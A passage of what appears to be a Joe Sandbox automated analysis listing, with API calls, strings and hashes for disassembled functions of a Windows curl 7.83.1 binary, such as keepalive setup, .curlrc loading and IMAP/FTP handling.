                                    • inet_pton.WS2_32(00000002,127.0.0.1,?), ref: 00E2E913
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,?,00E2EB73,?,?,?), ref: 00E2E937
                                      • Part of subcall function 00E2E822: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00E2E982,00000000,?,?,?,00E2EB73), ref: 00E2E849
                                      • Part of subcall function 00E2E822: htons.WS2_32(?), ref: 00E2E85B
                                      • Part of subcall function 00E2E822: inet_pton.WS2_32(00000017,::1,?), ref: 00E2E877
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callochtonsinet_pton
                                    • String ID: 127.0.0.1$localhost
                                    • API String ID: 4237634067-2339935011
                                    • Opcode ID: 76a18c00dad92e068ffcbcc44a63518c4e9cd81d28323c93369e43a7425bb0ae
                                    • Instruction ID: bd51b230b29349308f19dcb95e03da26d3a9d405ece43572ac5873e5086b8ad4
                                    • Opcode Fuzzy Hash: 76a18c00dad92e068ffcbcc44a63518c4e9cd81d28323c93369e43a7425bb0ae
                                    • Instruction Fuzzy Hash: DE11AFB6A003189FDB05CF95E89569BBBF5FF89310F20546AE804AB241D7B19945CBD0
                                    Function 00E07F31 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F43
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07F5F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E07F89
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E07FA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree
                                    • String ID: a
                                    • API String ID: 1865132094-3904355907
                                    • Opcode ID: 499e057081169c10c6f1da4807e7aeeb1db7825d84ab3f97e36cf2b150ee9705
                                    • Instruction ID: 74c105753766ecefd496ef487a5a716057197e153eb362e1d0c212c36d4976d5
                                    • Opcode Fuzzy Hash: 499e057081169c10c6f1da4807e7aeeb1db7825d84ab3f97e36cf2b150ee9705
                                    • Instruction Fuzzy Hash: 1D215E3560C7819FC720CF7494946ABB7E1AF85319F185D1EE6EEB72C0DB31A8898741
                                    Function 00E1DCB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00E1DCE2
                                    • WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00E1DD3E
                                    • WSAGetLastError.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000,?,0000FFFF,00000008,?,00000004), ref: 00E1DD48
                                    Strings
                                    • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00E1DCED
                                    • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00E1DD50
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorIoctlLastsetsockopt
                                    • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                    • API String ID: 1819429192-3022933585
                                    • Opcode ID: 5ab570aa90e45681d2315c79ee22781eec5b6ab3a435f21673ba1ad1c3c98fec
                                    • Instruction ID: 5f5667b6501c01a4de02e2b82275a6bb746dd8443fe12fbd58612942a2ebdbe3
                                    • Opcode Fuzzy Hash: 5ab570aa90e45681d2315c79ee22781eec5b6ab3a435f21673ba1ad1c3c98fec
                                    • Instruction Fuzzy Hash: 87116DB2A40205AEE7149F65DC46EFFB6BCEB46710F00462AF515F6180EA749A04CBA1
                                    Function 00E0DB81 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,00E6F580,00000200,.curlrc,00000000,00000000,.curlrc,?,00E0DC8B,?,00000000,00000000), ref: 00E0DB9B
                                    • _strrchr.LIBCMT ref: 00E0DBAC
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00E6F580,00E57A20,00000000,00000200,%s%s,00E5734C,.curlrc,?,00E0DC8B,?,00000000,00000000), ref: 00E0DC03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: FileModuleName_strrchrfopen
                                    • String ID: %s%s$.curlrc
                                    • API String ID: 494197015-3900187666
                                    • Opcode ID: 637f0cd5b4dd3df0eb9d9e4f58149070c2edf5679940c17d30892143b3d40948
                                    • Instruction ID: 543ba7475178a81ab0f29cd61ddd1b88e8c2e6a5a1720c06652ebbbde7169dd8
                                    • Opcode Fuzzy Hash: 637f0cd5b4dd3df0eb9d9e4f58149070c2edf5679940c17d30892143b3d40948
                                    • Instruction Fuzzy Hash: 5611AF3120C3046EFB185EB8AC85BBB7F98CB823A4F10297DF442B3182D5A29D088330
                                    Function 00E08B82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0(Build-time engines:), ref: 00E08BAB
                                    • puts.API-MS-WIN-CRT-STDIO-L1-1-0( <none>), ref: 00E08BDB
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: puts$__acrt_iob_func
                                    • String ID: %s$ <none>$Build-time engines:
                                    • API String ID: 1292152210-2903797034
                                    • Opcode ID: 80cb60d2e542c24aa6200c53b2bdfa6c8bf4b40e9efc00427f36a1d7476204e3
                                    • Instruction ID: c80c7f7ba41a86002b10d075f4011083b2f1ade6e35ec9c820a4fdbe37997280
                                    • Opcode Fuzzy Hash: 80cb60d2e542c24aa6200c53b2bdfa6c8bf4b40e9efc00427f36a1d7476204e3
                                    • Instruction Fuzzy Hash: 6B01D676A05308EBCB08EB54ED12DEE7BB4AF08701F1410ADF805B21D1EF715F449A85
                                    Function 00E4C34C Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 256COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E4C3E2
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E4C5B5
                                    Strings
                                    • response reading failed, xrefs: 00E4C441
                                    • Excessive server response line length received, %zd bytes. Stripping, xrefs: 00E4C525
                                    • cached response data too big to handle, xrefs: 00E4C5EC
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
                                    • API String ID: 3061335427-1004035239
                                    • Opcode ID: 1eb64462e16fd8c65c8414fd054e338ce03e8d58d9a879f80979ce11317ddfc4
                                    • Instruction ID: d83c180d8fee63695e9b5ebf76d88c936fa9eea0f4801044dbeee4ca6bce9bfe
                                    • Opcode Fuzzy Hash: 1eb64462e16fd8c65c8414fd054e338ce03e8d58d9a879f80979ce11317ddfc4
                                    • Instruction Fuzzy Hash: 05A1BE71E0470AAFCB04CFA4E890AAEFBB5FF48314F20C56AE815B7240D774A951CB90
                                    Function 00E16F2D Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 225COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E16F9B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E16FB9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E170AA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E17229
                                    Strings
                                    • Connection #%ld to host %s left intact, xrefs: 00E17182
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Connection #%ld to host %s left intact
                                    • API String ID: 1294909896-3505918467
                                    • Opcode ID: 8ef326b594ae532c26dc8bb350e13bb783d3d8d08b7afebd7f8840d42c964996
                                    • Instruction ID: afd8fc58b864892c2fd8f5cc082b638f5d8d78a77bcd7d0e66db17f03a49dc61
                                    • Opcode Fuzzy Hash: 8ef326b594ae532c26dc8bb350e13bb783d3d8d08b7afebd7f8840d42c964996
                                    • Instruction Fuzzy Hash: 5F811730B05214AFDB299F24D8897E9B7F1BF48B14F185069E8887B292CB746CC5CB91
                                    Function 00E41C53 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 162COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E109FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41DC6
                                    Strings
                                    • *, xrefs: 00E41C60
                                    • Failed to parse FETCH response., xrefs: 00E41CA0
                                    • Found %I64d bytes to download, xrefs: 00E41D02
                                    • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00E41D7B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _errnofree
                                    • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
                                    • API String ID: 1830139605-1126424615
                                    • Opcode ID: 5d45cb005879c3cec9d5cbebed61b6002abcfda8a907e4804a1bbdab7c46d755
                                    • Instruction ID: 390c8b28df042ce263fc00bc6aa4270efa93774eea4cb2cbac708b45611989c5
                                    • Opcode Fuzzy Hash: 5d45cb005879c3cec9d5cbebed61b6002abcfda8a907e4804a1bbdab7c46d755
                                    • Instruction Fuzzy Hash: 3C51D7B1A40205AFDF18DB29DC85BBAB7F8FF85369F1451A9E409B7282D7706D808790
                                    Function 00E467EE Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 149COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E30591,00000001,00000000,00000000,00000000,?,?,?), ref: 00E46847
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                    • API String ID: 2803490479-989668499
                                    • Opcode ID: e4f82eb3731dc58e915d95bb7afde4b9ecf5b11bcb9ceef014bdc6c2947a5722
                                    • Instruction ID: e8ce2e4889cec6325524d8fb054972fd005f77102da8cbdcdf108b5ad38ddfa5
                                    • Opcode Fuzzy Hash: e4f82eb3731dc58e915d95bb7afde4b9ecf5b11bcb9ceef014bdc6c2947a5722
                                    • Instruction Fuzzy Hash: 50415B729046945FD7068A7898617FF7FF99B8B301F0801EAE8A0F7282D5758A02CB61
                                    Function 00E2E5C0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 137COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00E2E61D
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 00E2E657
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 00E2E6F0
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 00E2E70A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: Shuffling %i addresses
                                    • API String ID: 3061335427-3589116693
                                    • Opcode ID: b516f2ff4d58237da1bea7ebd5a776e56f59ea6524994d2663dda39a38fa2bf1
                                    • Instruction ID: e7c684c5ad8bb82b644e23475cd51957952aad7d7f78e3402036b9caf3f90faa
                                    • Opcode Fuzzy Hash: b516f2ff4d58237da1bea7ebd5a776e56f59ea6524994d2663dda39a38fa2bf1
                                    • Instruction Fuzzy Hash: 9D413675E0062ADFCB18DF69E8948AEBBF4FF48754B15416AE805FB350DB30AD058B80
                                    Function 00E0FD52 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0FD9E
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000B08), ref: 00E0FDBD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0FDCC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callocfreemalloc
                                    • String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
                                    • API String ID: 4086611775-2317922172
                                    • Opcode ID: ad0e8a90f24c42bff3329a8a4c5ce99bb56729930b309bbe1ff5359f7257f28d
                                    • Instruction ID: bf75d71c4037a53d0ac177db90501f6218ce69698c3f7b5aa986e12676f9fba9
                                    • Opcode Fuzzy Hash: ad0e8a90f24c42bff3329a8a4c5ce99bb56729930b309bbe1ff5359f7257f28d
                                    • Instruction Fuzzy Hash: 53412675A003099FDB28DF24C854BEAB3F5EF88314F1045ADE419A7392EB71AD868B50
                                    Function 00E27D60 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 108stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00E6FA10,?), ref: 00E27E88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: strncpy
                                    • String ID: %s%s%s%s$<{$xk$xk
                                    • API String ID: 3301158039-1040737488
                                    • Opcode ID: 8291d0e1cda83f60afcd766506466846b8043ca0ac00f53657c3980b8e5d3f2d
                                    • Instruction ID: 9979ca3c071d3861ad0323b3104610b4237fa155f4f6715f9e2fe0bc02076166
                                    • Opcode Fuzzy Hash: 8291d0e1cda83f60afcd766506466846b8043ca0ac00f53657c3980b8e5d3f2d
                                    • Instruction Fuzzy Hash: 0E41DF71A042298FDB14CB59FC81BAABBA5EB84344F1495FEE849F3241C6709D488FB0
                                    Function 00E3DFE0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0B6
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0D4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3E0EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Failure sending QUIT command: %s$QUIT
                                    • API String ID: 1294909896-1162443993
                                    • Opcode ID: cf96727439e249c884f2ba29af19895991a7dbe5ff134348e3954dbe2f02fde9
                                    • Instruction ID: d173e0b11e2e5c3d4d435740254903f83d8f05df09725e8482028fff8e180cd7
                                    • Opcode Fuzzy Hash: cf96727439e249c884f2ba29af19895991a7dbe5ff134348e3954dbe2f02fde9
                                    • Instruction Fuzzy Hash: 1E31E6717087019FDB189F39A8887A6BBD5BF44314F04517AE80DB7392DBF5A844CB91
                                    Function 00E0673A Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E06762
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E06790
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(10000000), ref: 00E067A9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E067D1
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(01000000), ref: 00E067EA
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree$___from_strstr_to_strchr
                                    • String ID:
                                    • API String ID: 104559748-0
                                    • Opcode ID: 966f63ad556a34b377b5e84f2fb642c6b75c44db7a3bf56be5acd5688437d2dc
                                    • Instruction ID: b78f36b4eb1383b4c02a626c85a32814321a8660d3562f6aa13c167c9ed7f73a
                                    • Opcode Fuzzy Hash: 966f63ad556a34b377b5e84f2fb642c6b75c44db7a3bf56be5acd5688437d2dc
                                    • Instruction Fuzzy Hash: 4F3189315087418FC325CF2894547ABBBF1AF85318F282E5EE0D6B75D1DB21E88ACB41
                                    Function 00E41588 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E415B1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E415CF
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID: Cannot SELECT without a mailbox.$SELECT %s
                                    • API String ID: 1294909896-2454231232
                                    • Opcode ID: 4e21800ab0f8e6d8e7c99719b7c40d85ceaa98c9f5f22f235fb320e3d79b3a4e
                                    • Instruction ID: f907f8d18814febcd06718fd78828dbb9cf5f0ecc4bd52e16804753a0991f959
                                    • Opcode Fuzzy Hash: 4e21800ab0f8e6d8e7c99719b7c40d85ceaa98c9f5f22f235fb320e3d79b3a4e
                                    • Instruction Fuzzy Hash: 88110432700215EFDB049F15FC45BADB7A8FF84365F1540AAE905B72A1DBB4AC048BD4
                                    Function 00E08EEC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00E121C0: FreeLibrary.KERNELBASE(00000000,?,00E08EF6), ref: 00E12208
                                      • Part of subcall function 00E121C0: WSACleanup.WS2_32 ref: 00E12227
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08EF9
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E08F13
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E08F2B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08F38
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E08F57
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclose$CleanupFreeLibrary
                                    • String ID:
                                    • API String ID: 3795980997-0
                                    • Opcode ID: 6130b7c884ac0ee953a613720da80ee4e86c2b80d59809983674d1486c25102d
                                    • Instruction ID: 41636a3cb2de432659dacd1bd19244bb77d905d22e98116d759d07c169d44e58
                                    • Opcode Fuzzy Hash: 6130b7c884ac0ee953a613720da80ee4e86c2b80d59809983674d1486c25102d
